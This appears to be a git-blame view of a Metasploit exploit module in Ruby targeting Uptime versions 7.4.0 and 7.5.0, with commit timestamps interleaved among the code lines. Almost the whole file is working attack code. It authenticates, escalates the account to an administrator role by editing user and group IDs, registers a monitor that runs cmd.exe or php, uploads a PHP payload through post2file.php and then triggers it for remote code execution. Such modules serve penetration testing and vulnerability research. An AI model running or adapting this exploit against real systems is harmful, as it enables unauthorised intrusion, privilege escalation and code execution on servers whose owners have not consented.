2015-08-31 23:57:39 +02:00
|
|
|
##
|
|
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
class Metasploit4 < Msf::Exploit::Remote
|
2015-09-03 20:29:57 +02:00
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
include Msf::Exploit::PhpEXE
|
|
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
|
super(update_info(info,
|
2015-10-23 11:33:59 +02:00
|
|
|
'Name' => 'Uptime Version 7.4.0 / 7.5.0 Upload and Exec file',
|
|
|
|
|
'Description' => %q{
|
|
|
|
|
This module exploits a vulnerability found in Uptime
|
|
|
|
|
version 7.4.0 and 7.5.0 By supplying a specially
|
|
|
|
|
crafted request is possible to upload file and execute
|
|
|
|
|
arbitrary commands through privilege escalation.
|
|
|
|
|
},
|
|
|
|
|
'License' => MSF_LICENSE,
|
2015-10-23 11:49:21 +02:00
|
|
|
'Author' =>
|
2015-10-23 11:33:59 +02:00
|
|
|
[
|
|
|
|
|
'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>',
|
|
|
|
|
'Gjoko Krstic(LiquidWorm) <gjoko[at]zeroscience.mk>'
|
|
|
|
|
],
|
|
|
|
|
'References' =>
|
|
|
|
|
[
|
|
|
|
|
['EDB', '37888']
|
|
|
|
|
],
|
2015-10-23 11:49:21 +02:00
|
|
|
'Payload' =>
|
2015-10-23 11:33:59 +02:00
|
|
|
{
|
|
|
|
|
'Space' => 100_000,
|
|
|
|
|
'DisableNops' => true
|
|
|
|
|
},
|
|
|
|
|
'Platform' => ['php'],
|
|
|
|
|
'Arch' => ARCH_PHP,
|
|
|
|
|
'Targets' => [['Automatic', {}]],
|
2015-10-23 11:49:21 +02:00
|
|
|
'DefaultOptions' =>
|
2015-10-23 11:33:59 +02:00
|
|
|
{
|
|
|
|
|
'SSL' => false
|
|
|
|
|
},
|
|
|
|
|
'Privileged' => 'True',
|
|
|
|
|
'DefaultTarget' => 0,
|
|
|
|
|
'DisclosureDate' => 'Aug 6 2015'))
|
2015-09-03 20:29:57 +02:00
|
|
|
|
2015-10-23 11:33:59 +02:00
|
|
|
register_options(
|
|
|
|
|
[
|
|
|
|
|
Opt::RPORT(9999),
|
|
|
|
|
OptString.new('USERNAME', [true, 'The username to authenticate as', 'sample']),
|
|
|
|
|
OptString.new('PASSWORD', [true, 'The password to authenticate with', 'sample'])
|
|
|
|
|
], self.class)
|
2015-08-31 23:57:39 +02:00
|
|
|
end
|
2015-09-04 19:19:02 +02:00
|
|
|
# Application Check
|
2015-09-03 20:29:57 +02:00
|
|
|
def check
|
|
|
|
|
res = send_request_cgi(
|
|
|
|
|
'method' => 'GET',
|
2015-09-05 10:07:58 +02:00
|
|
|
'uri' => normalize_uri(target_uri.path)
|
2015-09-04 19:19:02 +02:00
|
|
|
)
|
2015-09-04 22:12:42 +02:00
|
|
|
vprint_status("#{peer} - Checking version...")
|
2015-08-31 23:57:39 +02:00
|
|
|
|
2015-10-23 11:33:59 +02:00
|
|
|
if res && res.code == 200 && (res.body.include?('up.time 7.5.0') || res.body.include?('up.time 7.4.0'))
|
2015-09-03 20:29:57 +02:00
|
|
|
return Exploit::CheckCode::Appears
|
|
|
|
|
end
|
|
|
|
|
Exploit::CheckCode::Safe
|
|
|
|
|
end
|
2015-08-31 23:57:39 +02:00
|
|
|
|
2015-10-23 13:10:00 -05:00
|
|
|
def create_exec_service(*args)
|
|
|
|
|
cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs = *args
|
|
|
|
|
res_service = send_request_cgi(
|
|
|
|
|
'method' => 'POST',
|
|
|
|
|
'uri' => normalize_uri(target_uri.path, 'main.php'),
|
|
|
|
|
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
|
|
|
|
|
'vars_get' => {
|
|
|
|
|
'section' => 'ERDCInstance',
|
|
|
|
|
'subsection' => 'add',
|
|
|
|
|
},
|
|
|
|
|
'vars_post' => {
|
|
|
|
|
'initialERDCId' => '20',
|
|
|
|
|
'target' => '1',
|
|
|
|
|
'targetType' => 'systemList',
|
|
|
|
|
'systemList' => '1',
|
|
|
|
|
'serviceGroupList' => '-10',
|
|
|
|
|
'initialMode' => 'standard',
|
|
|
|
|
'erdcName' => 'Exploit',
|
|
|
|
|
'erdcInitialName' => '',
|
|
|
|
|
'erdcDescription' => 'Exploit',
|
|
|
|
|
'hostButton' => 'system',
|
|
|
|
|
'erdc_id' => '20',
|
|
|
|
|
'forceReload' => '0',
|
|
|
|
|
'operation' => 'standard',
|
|
|
|
|
'erdc_instance_id' => '',
|
|
|
|
|
'label_[184]' => 'Script Name',
|
|
|
|
|
'value_[184]' => cmd,
|
|
|
|
|
'id_[184]' => 'process',
|
|
|
|
|
'name_[process]' => '184',
|
|
|
|
|
'units_[184]' => '',
|
|
|
|
|
'guiBasic_[184]' => '1',
|
|
|
|
|
'inputType_[184]' => 'GUIString',
|
|
|
|
|
'screenOrder_[184]' => '1',
|
|
|
|
|
'parmType_[184]' => '1',
|
|
|
|
|
'label_[185]' => 'Arguments',
|
|
|
|
|
'value_[185]' => cmdargs,
|
|
|
|
|
'id_[185]' => 'args',
|
|
|
|
|
'name_[args]' => '185',
|
|
|
|
|
'units_[185]' => '',
|
|
|
|
|
'guiBasic_[185]' => '1',
|
|
|
|
|
'inputType_[185]' => 'GUIString',
|
|
|
|
|
'screenOrder_[185]' => '2',
|
|
|
|
|
'parmType_[185]' => '1',
|
|
|
|
|
'label_[187]' => 'Output',
|
|
|
|
|
'can_retain_[187]' => 'false',
|
|
|
|
|
'comparisonWarn_[187]' => '-1',
|
|
|
|
|
'comparison_[187]' => '-1',
|
|
|
|
|
'id_[187]' => 'value_critical_output',
|
|
|
|
|
'name_[output]' => '187',
|
|
|
|
|
'units_[187]' => '',
|
|
|
|
|
'guiBasic_[187]' => '1',
|
|
|
|
|
'inputType_[187]' => 'GUIString',
|
|
|
|
|
'screenOrder_[187]' => '4',
|
|
|
|
|
'parmType_[187]' => '2',
|
|
|
|
|
'label_[189]' => 'Response time',
|
|
|
|
|
'can_retain_[189]' => 'false',
|
|
|
|
|
'comparisonWarn_[189]' => '-1',
|
|
|
|
|
'comparison_[189]' => '-1',
|
|
|
|
|
'id_[189]' => 'value_critical_timer',
|
|
|
|
|
'name_[timer]' => '189',
|
|
|
|
|
'units_[189]' => 'ms',
|
|
|
|
|
'guiBasic_[189]' => '0',
|
|
|
|
|
'inputType_[189]' => 'GUIInteger',
|
|
|
|
|
'screenOrder_[189]' => '6',
|
|
|
|
|
'parmType_[189]' => '2',
|
|
|
|
|
'timing_[erdc_instance_monitored]' => '1',
|
|
|
|
|
'timing_[timeout]' => '60',
|
|
|
|
|
'timing_[check_interval]' => '10',
|
|
|
|
|
'timing_[recheck_interval]' => '1',
|
|
|
|
|
'timing_[max_rechecks]' => '3',
|
|
|
|
|
'alerting_[notification]' => '1',
|
|
|
|
|
'alerting_[alert_interval]' => '120',
|
|
|
|
|
'alerting_[alert_on_critical]' => '1',
|
|
|
|
|
'alerting_[alert_on_warning]' => '1',
|
|
|
|
|
'alerting_[alert_on_recovery]' => '1',
|
|
|
|
|
'alerting_[alert_on_unknown]' => '1',
|
|
|
|
|
'time_period_id' => '1',
|
|
|
|
|
'pageFinish' => 'Finish',
|
|
|
|
|
'pageContinue' => 'Continue...',
|
|
|
|
|
'isWizard' => '1',
|
|
|
|
|
'wizardPage' => '2',
|
|
|
|
|
'wizardNumPages' => '2',
|
|
|
|
|
'wizardTask' => 'pageFinish',
|
|
|
|
|
'visitedPage[1]' => '1',
|
|
|
|
|
'visitedPage[2]' => '1'
|
|
|
|
|
})
|
|
|
|
|
end
|
|
|
|
|
|
2015-09-03 20:29:57 +02:00
|
|
|
def exploit
|
2015-09-04 22:12:42 +02:00
|
|
|
vprint_status('Trying to login...')
|
2015-09-04 19:19:02 +02:00
|
|
|
# #Application Login
|
2015-09-03 20:29:57 +02:00
|
|
|
res_auth = send_request_cgi(
|
|
|
|
|
'method' => 'POST',
|
2015-09-05 10:07:58 +02:00
|
|
|
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
2015-09-03 20:29:57 +02:00
|
|
|
'vars_post' => {
|
|
|
|
|
'username' => datastore['USERNAME'],
|
|
|
|
|
'password' => datastore['PASSWORD']
|
|
|
|
|
})
|
|
|
|
|
|
2015-09-04 19:19:02 +02:00
|
|
|
# #Check OS #
|
|
|
|
|
phpfile_name = rand_text_alpha(10)
|
2015-10-23 11:33:59 +02:00
|
|
|
if res_auth && res_auth.headers['Server'] =~ /Unix/
|
2015-09-04 23:18:24 +02:00
|
|
|
vprint_status('Found Linux installation - Setting appropriated PATH')
|
2015-09-03 20:29:57 +02:00
|
|
|
phppath = '/usr/local/uptime/apache/bin/php'
|
|
|
|
|
uploadpath = '/usr/local/uptime/GUI/wizards'
|
2015-10-23 11:33:59 +02:00
|
|
|
## cmdargs = uploadpath + '/' + phpfile_name + '.txt'
|
|
|
|
|
cmdargs = "#{uploadpath}#{phpfile_name}.txt"
|
2015-09-04 19:19:02 +02:00
|
|
|
cmd = phppath
|
2015-08-31 23:57:39 +02:00
|
|
|
else
|
2015-09-05 10:07:58 +02:00
|
|
|
vprint_status('Found Windows installation - Setting appropriated PATH')
|
2015-09-03 20:29:57 +02:00
|
|
|
phppath = 'C:\\Program Files\\uptime software\\uptime\\apache\\php\\php.exe'
|
2015-10-23 11:33:59 +02:00
|
|
|
uploadpath = 'C:\\Program Files\\uptime software\\uptime\\GUI\\wizards\\'
|
2015-09-04 19:19:02 +02:00
|
|
|
cmd = 'c:\\windows\\system32\\cmd.exe'
|
2015-10-23 11:33:59 +02:00
|
|
|
## cmdargs = '/K "' + '"' + phppath + '" ' + '"' + uploadpath + '\\' + phpfile_name + '.txt' + '"' + '"'
|
|
|
|
|
cmdargs = "/K \"\"#{phppath}\" \"#{uploadpath}#{phpfile_name}.txt\"\""
|
2015-08-31 23:57:39 +02:00
|
|
|
end
|
2015-09-03 20:29:57 +02:00
|
|
|
|
2015-10-23 11:33:59 +02:00
|
|
|
if res_auth && res_auth.get_cookies =~ /login=true/
|
2015-09-03 20:29:57 +02:00
|
|
|
cookie = Regexp.last_match(1)
|
|
|
|
|
cookie_split = res_auth.get_cookies.split(';')
|
2015-09-04 22:12:42 +02:00
|
|
|
vprint_status("Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
|
2015-09-03 20:29:57 +02:00
|
|
|
print_good('Login success')
|
|
|
|
|
|
2015-09-04 19:19:02 +02:00
|
|
|
# Privilege escalation getting user ID
|
2015-09-03 20:29:57 +02:00
|
|
|
res_priv = send_request_cgi(
|
|
|
|
|
'method' => 'GET',
|
2015-09-05 10:07:58 +02:00
|
|
|
'uri' => normalize_uri(target_uri.path, 'main.php'),
|
2015-09-04 19:19:02 +02:00
|
|
|
'vars_get' => {
|
|
|
|
|
'page' => 'Users',
|
|
|
|
|
'subPage' => 'UserContainer'
|
|
|
|
|
},
|
2015-09-05 10:07:58 +02:00
|
|
|
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}"
|
2015-09-04 19:19:02 +02:00
|
|
|
)
|
2015-09-03 20:29:57 +02:00
|
|
|
matchdata = res_priv.body.match(/UPTIME.CurrentUser.userId.*/)
|
|
|
|
|
get_id = matchdata[0].gsub(/[^\d]/, '')
|
2015-09-04 22:12:42 +02:00
|
|
|
vprint_status('Escalating privileges...')
|
2015-09-03 20:29:57 +02:00
|
|
|
|
2015-09-04 19:19:02 +02:00
|
|
|
# Privilege escalation post
|
2015-09-03 20:29:57 +02:00
|
|
|
res_priv_elev = send_request_cgi(
|
|
|
|
|
'method' => 'POST',
|
2015-09-05 10:07:58 +02:00
|
|
|
'uri' => normalize_uri(target_uri.path, 'main.php'),
|
2015-09-04 19:19:02 +02:00
|
|
|
'vars_get' => {
|
|
|
|
|
'section' => 'UserContainer',
|
|
|
|
|
'subsection' => 'edit',
|
|
|
|
|
'id' => "#{get_id}"
|
|
|
|
|
},
|
2015-10-23 11:33:59 +02:00
|
|
|
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
|
2015-09-04 19:19:02 +02:00
|
|
|
'vars_post' => {
|
|
|
|
|
'operation' => 'submit',
|
|
|
|
|
'disableEditOfUsernameRoleGroup' => 'false',
|
|
|
|
|
'username' => datastore['USERNAME'],
|
|
|
|
|
'password' => datastore['PASSWORD'],
|
|
|
|
|
'passwordConfirm' => datastore['PASSWORD'],
|
|
|
|
|
'firstname' => rand_text_alpha(10),
|
|
|
|
|
'lastname' => rand_text_alpha(10),
|
|
|
|
|
'location' => '',
|
|
|
|
|
'emailaddress' => '',
|
|
|
|
|
'emailtimeperiodid' => '1',
|
|
|
|
|
'phonenumber' => '',
|
|
|
|
|
'phonenumbertimeperiodid' => '1',
|
|
|
|
|
'windowshost' => '',
|
|
|
|
|
'windowsworkgroup' => '',
|
|
|
|
|
'windowspopuptimeperiodid' => '1',
|
|
|
|
|
'landingpage' => 'MyPortal',
|
|
|
|
|
'isonvacation' => '0',
|
|
|
|
|
'receivealerts' => '0',
|
|
|
|
|
'activexgraphs' => '0',
|
|
|
|
|
'newuser' => 'on',
|
|
|
|
|
'newuser' => '1',
|
|
|
|
|
'userroleid' => '1',
|
|
|
|
|
'usergroupid[]' => '1'
|
|
|
|
|
}
|
|
|
|
|
)
|
|
|
|
|
|
|
|
|
|
# Refresing perms
|
2015-09-04 22:12:42 +02:00
|
|
|
vprint_status('Refresing perms...')
|
2015-09-03 20:29:57 +02:00
|
|
|
res_priv = send_request_cgi(
|
|
|
|
|
'method' => 'GET',
|
2015-09-05 10:07:58 +02:00
|
|
|
'uri' => normalize_uri(target_uri.path, 'index.php?loggedout'),
|
2015-10-23 11:33:59 +02:00
|
|
|
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}"
|
2015-09-03 20:29:57 +02:00
|
|
|
)
|
|
|
|
|
|
|
|
|
|
res_auth = send_request_cgi(
|
|
|
|
|
'method' => 'POST',
|
2015-09-05 10:07:58 +02:00
|
|
|
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
2015-09-04 19:19:02 +02:00
|
|
|
'vars_post' => {
|
|
|
|
|
'username' => datastore['USERNAME'],
|
|
|
|
|
'password' => datastore['PASSWORD']
|
|
|
|
|
}
|
|
|
|
|
)
|
2015-10-23 11:33:59 +02:00
|
|
|
if res_auth && res_auth.get_cookies =~ /login=true/
|
2015-09-03 20:29:57 +02:00
|
|
|
cookie = Regexp.last_match(1)
|
|
|
|
|
cookie_split = res_auth.get_cookies.split(';')
|
2015-09-04 22:12:42 +02:00
|
|
|
vprint_status("New Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
|
2015-09-03 20:29:57 +02:00
|
|
|
print_good('Priv. Escalation success')
|
|
|
|
|
end
|
|
|
|
|
|
2015-09-04 19:19:02 +02:00
|
|
|
# CREATING Linux EXEC Service
|
2015-10-23 11:33:59 +02:00
|
|
|
if res_auth && res_auth.headers['Server'] =~ /Unix/
|
2015-09-04 22:12:42 +02:00
|
|
|
vprint_status('Creating Linux Monitor Code exec...')
|
2015-09-04 19:19:02 +02:00
|
|
|
create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs)
|
2015-09-03 20:29:57 +02:00
|
|
|
|
|
|
|
|
else
|
2015-09-04 19:19:02 +02:00
|
|
|
# CREATING Windows EXEC Service#
|
2015-09-04 22:12:42 +02:00
|
|
|
vprint_status('Creating Windows Monitor Code exec...')
|
2015-09-04 19:19:02 +02:00
|
|
|
create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs)
|
2015-09-03 20:29:57 +02:00
|
|
|
end
|
|
|
|
|
|
2015-09-04 19:19:02 +02:00
|
|
|
# Upload file
|
2015-09-04 22:12:42 +02:00
|
|
|
vprint_status('Uploading file...')
|
2015-09-04 19:19:02 +02:00
|
|
|
send_request_cgi(
|
|
|
|
|
'method' => 'POST',
|
2015-09-05 10:07:58 +02:00
|
|
|
'uri' => normalize_uri(target_uri.path, 'wizards', 'post2file.php'),
|
2015-09-04 19:19:02 +02:00
|
|
|
'vars_post' => {
|
2015-10-23 11:33:59 +02:00
|
|
|
## 'file_name' => phpfile_name + '.txt',
|
|
|
|
|
'file_name' => "#{phpfile_name}.txt",
|
2015-09-04 19:19:02 +02:00
|
|
|
'script' => payload.encoded
|
|
|
|
|
}
|
|
|
|
|
)
|
2015-09-03 20:29:57 +02:00
|
|
|
|
2015-09-04 22:12:42 +02:00
|
|
|
vprint_status('Checking Uploaded file...')
|
2015-09-04 19:19:02 +02:00
|
|
|
res_up_check = send_request_cgi(
|
|
|
|
|
'method' => 'GET',
|
2015-09-05 10:07:58 +02:00
|
|
|
'uri' => normalize_uri(target_uri.path, 'wizards', "#{phpfile_name}.txt")
|
2015-09-04 19:19:02 +02:00
|
|
|
)
|
2015-09-03 20:29:57 +02:00
|
|
|
|
2015-10-23 11:33:59 +02:00
|
|
|
if res_up_check && res_up_check.code == 200
|
2015-09-03 20:29:57 +02:00
|
|
|
print_good("File found: #{phpfile_name}")
|
|
|
|
|
else
|
|
|
|
|
print_error('File not found')
|
|
|
|
|
end
|
|
|
|
|
|
2015-09-04 19:19:02 +02:00
|
|
|
# #Get Monitor ID
|
2015-09-03 20:29:57 +02:00
|
|
|
|
2015-09-04 22:12:42 +02:00
|
|
|
vprint_status('Fetching Monitor ID...')
|
2015-09-04 19:19:02 +02:00
|
|
|
res_mon_id = send_request_cgi(
|
|
|
|
|
'method' => 'GET',
|
2015-09-05 10:07:58 +02:00
|
|
|
'uri' => normalize_uri(target_uri.path, 'ajax', 'jsonQuery.php'),
|
|
|
|
|
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
|
2015-09-04 19:19:02 +02:00
|
|
|
'vars_get' => {
|
|
|
|
|
'query' => 'GET_SERVICE_PAGE_ERDC_LIST',
|
|
|
|
|
'iDisplayStart' => '0',
|
|
|
|
|
'iDisplayLength' => '10',
|
|
|
|
|
'sSearch' => 'Exploit'
|
|
|
|
|
}
|
2015-09-05 10:07:58 +02:00
|
|
|
)
|
2015-09-03 20:29:57 +02:00
|
|
|
|
|
|
|
|
matchdata = res_mon_id.body.match(/id=?[^>]*>/)
|
|
|
|
|
mon_get_id = matchdata[0].gsub(/[^\d]/, '')
|
|
|
|
|
print_good("Monitor id aquired:#{mon_get_id}")
|
2015-09-04 19:19:02 +02:00
|
|
|
# Executing monitor
|
|
|
|
|
send_request_cgi(
|
|
|
|
|
'method' => 'POST',
|
2015-09-05 10:07:58 +02:00
|
|
|
'uri' => normalize_uri(target_uri.path, 'main.php'),
|
|
|
|
|
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
|
2015-09-04 19:19:02 +02:00
|
|
|
'vars_post' => {
|
|
|
|
|
'section' => 'RunERDCInstance',
|
|
|
|
|
'subsection' => 'view',
|
|
|
|
|
'id' => mon_get_id,
|
|
|
|
|
'name' => 'Exploit'
|
|
|
|
|
}
|
|
|
|
|
)
|
2015-08-31 23:57:39 +02:00
|
|
|
else
|
2015-09-04 22:12:42 +02:00
|
|
|
print_error("#{peer} - Cookie not found")
|
2015-08-31 23:57:39 +02:00
|
|
|
end
|
2015-09-03 20:29:57 +02:00
|
|
|
end
|
2015-08-31 23:57:39 +02:00
|
|
|
end
|
